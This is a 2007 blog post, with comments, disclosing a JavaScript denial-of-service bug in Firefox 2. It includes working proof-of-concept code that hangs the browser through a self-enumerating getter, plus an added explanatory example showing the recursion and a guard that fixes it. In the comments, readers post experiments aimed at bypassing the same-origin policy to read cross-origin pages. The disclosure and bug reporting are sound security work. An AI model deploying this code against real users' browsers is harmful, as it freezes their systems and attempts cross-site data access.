Firefox history DOS attack
Wednesday, 14 November 2007
Here’s a complete DOS attack on Firefox using the history object:-
window.onload = function() {
    // Define a getter on the history object whose body enumerates
    // the object itself. The enumeration reaches "x", which invokes
    // this same getter again, so the recursion never terminates.
    history.__defineGetter__("x", function() {
        for (i in this) {
            try {
                alert(this[i]);
            } catch(e) {
                // the engine's "too much recursion" error is swallowed here,
                // so every level of the recursion still runs its loop
            }
        }
    });
    history.x;
}
Tested on Firefox 2.0.0.9 on Mac: a window pops up with two blank buttons and you are unable to do anything without using Force Quit.
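The mechanism behind the hang, as an added example that is not part of the original post: a getter that enumerates its own object re-enters itself because the enumeration reaches the getter's own property name, and the empty catch swallows the engine's recursion error so every frame still finishes its loop. The code below (constructed for this page, runs under Node.js) replaces alert() with a counter so the effect can be measured, uses a plain object in place of history as Jesse's comment suggests, and shows a re-entrancy guard that bounds the walk; the `guarded` flag and the `stats` names are assumptions of this example.

```javascript
"use strict";

// Constructed example, not the original post's code. Builds a plain object with
// an enumerable getter "x" that walks its own object, and reports how deep the
// recursion went and how many property reads (the original's alert calls) ran.
// With guarded === false the behaviour mirrors the post; with guarded === true a
// re-entrancy flag makes the getter refuse to recurse into itself.
function runSelfEnumeratingGetter(guarded) {
  const stats = { visits: 0, overflows: 0, maxDepth: 0 };
  let depth = 0;
  let busy = false;
  const obj = { a: 1, b: 2 }; // stands in for window.history

  Object.defineProperty(obj, "x", {
    enumerable: true,
    configurable: true,
    get() {
      depth++;
      if (depth > stats.maxDepth) stats.maxDepth = depth;
      if (guarded && busy) {
        // Re-entrant call: the outer walk is already in progress, so return
        // without enumerating again. This is the fix for the unbounded recursion.
        depth--;
        return undefined;
      }
      busy = true;
      try {
        for (const key in this) {
          try {
            // For key === "x" this read re-invokes the getter; each level of the
            // recursion performs its own full enumeration before returning.
            void this[key];
            stats.visits++; // one alert() in the original
          } catch (e) {
            // Same effect as the original's empty catch: the RangeError raised
            // when the call stack is exhausted is swallowed and the loop goes on,
            // so the work done is proportional to the engine's stack limit.
            if (e instanceof RangeError) stats.overflows++;
            else throw e;
          }
        }
        return undefined;
      } finally {
        busy = false;
        depth--;
      }
    },
  });

  try {
    void obj.x; // the single property read that starts the whole walk
  } catch (e) {
    if (!(e instanceof RangeError)) throw e;
    stats.overflows++;
  }
  return stats;
}

console.log("guarded  :", runSelfEnumeratingGetter(true));
console.log("unguarded:", runSelfEnumeratingGetter(false));
```

The guarded run visits three properties at a maximum depth of two and never overflows; the unguarded run recurses until the engine throws, swallows that error at every level, and still performs thousands of reads, which is why thousands of alert dialogs (or a confused dialog, as in the post) appear before the page becomes responsive again.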
No. 1 — November 14th, 2007 at 9:43 pm
Nice work, Gareth. I’m really pulling that you figure out a way to break the same origin policy simply because it would be quite impressive.
No. 2 — November 14th, 2007 at 9:48 pm
Thanks 🙂 Yeah, that’s my plan. I’m not sure it’s possible because the objects are spoofed getters. I’m having fun trying though.
No. 3 — November 15th, 2007 at 10:14 am
Yep – the holy grail of SOP. I’ve been trying various approaches recently but haven’t had any success yet.
My last attempt was to fill iframes with HTML via this.innerHTML=’payload’ in the src attribute and trying to access the rendered content after a timeout. But Firefox manages to handle it too – any property inside contentWindow is access restricted.
No. 4 — November 15th, 2007 at 11:46 am
Here’s my new attempt:-
window.onload = function() {
    newElement = document.createElement('iframe');
    newElement.src = 'http://www.google.co.uk/';
    newElement.id = 'iframe';
    newElement.onload = function() {
        var doc = this.contentWindow.document;
        this.__defineGetter__('contentWindow', function() { return doc });
        x = this.contentWindow;
        delete this.contentWindow;
        delete doc;
        alert(x);
    }
    document.body.appendChild(newElement);
}
Doesn’t work though 🙁
No. 5 — November 15th, 2007 at 11:47 am
Accessing body or innerHTML causes a permission error.
No. 6 — November 16th, 2007 at 7:58 am
Thanks for discovering and reporting this clever way to confuse Firefox with recursion. I’ve filed https://bugzilla.mozilla.org/show_bug.cgi?id=403999 with a clearer testcase — you can use any object, even ({}), in place of the history object.
No. 7 — November 16th, 2007 at 9:13 am
Hey Jesse
No problem! Yeah I figured it would work on any object but the history one was the one I was testing at the time.
No. 8 — November 17th, 2007 at 6:08 pm
Does anyone have a study hint in order to fully appreciate the technical implications?
No. 9 — November 18th, 2007 at 7:31 am
Jophn, I’d start by reading old bugs in bugzilla.mozilla.org about JavaScript recursion limits, and then using those bug reports to find the relevant source code. Once you understand how they work, you might have enough information to fix the bug, or you might not — it might require knowledge of XBL or something. I don’t know, I’m more a tester than a Gecko developer 😉